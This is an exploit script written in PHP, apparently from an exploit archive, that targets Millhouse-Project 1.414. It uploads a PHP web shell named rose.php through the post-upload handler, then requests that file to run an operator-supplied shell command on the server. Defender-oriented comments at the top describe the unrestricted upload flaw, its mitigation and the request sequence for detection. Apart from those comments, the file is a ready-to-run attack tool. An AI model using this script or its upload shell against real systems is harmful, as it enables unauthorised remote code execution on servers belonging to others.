## https://sploitus.com/exploit?id=PACKETSTORM:172305
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/

// Review notes (defender's reading of what this script exercises):
// The application's /includes/add_post_sql.php accepts a multipart "image" part
// whose filename ends in .php and stores it under /images/, from where the web
// server executes it -- an unrestricted file upload that yields remote code
// execution. The only session material sent is a fixed PHPSESSID string, so
// presumably no authenticated session is required -- confirm against the app.
// Mitigation on the application side: allow-list upload extensions and MIME
// types, store uploads under a server-generated name outside the web root (or
// serve /images/ with script execution disabled), and require an authenticated
// session before accepting a post.
// Detection: a POST to /includes/add_post_sql.php containing a multipart part
// named "image" with a .php filename, followed shortly by a GET for
// /images/<that name>.php, is the observable request sequence.

// -u: target base URL, -c: command string; both are required.
$options = getopt('u:c:');

if(!isset($options['u'], $options['c']))
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi  
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n  
\033[0m\n  
\n");

$target = $options['u'];

$command = $options['c'];

// Upload handler on the target; this path is fixed by the vulnerable application.
$url = $target . '/includes/add_post_sql.php';


// Hand-built multipart/form-data body. The "image" part carries a file named
// rose.php whose PHP content embeds $command at the time this string is built.
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="title"  
  
helloworld  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="description"  
  
<p>sdsdsds</p>  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="category"  
  
1  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8  
Content-Disposition: form-data; name="image"; filename="rose.php"  
Content-Type: application/x-php  
  
<?php  
$shell = shell_exec("' . $command . '");  
echo $shell;  
?>  
  
------WebKitFormBoundaryzlHN0BEvvaJsDgh8--  
';

// The boundary here must match the one used in $post. The PHPSESSID value is a
// fixed literal, not a session obtained from the target.
$headers = array(
'Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
'Cookie: PHPSESSID=rose1337',
);

// First request: POST the multipart body to the upload handler. The response
// (headers included, via CURLOPT_HEADER) is captured but never inspected.
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
curl_close($ch);

// execute command

// Second request: GET the uploaded file from /images/ so the server runs it,
// then print whatever body comes back, wrapped in ANSI colour codes.
$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";

?>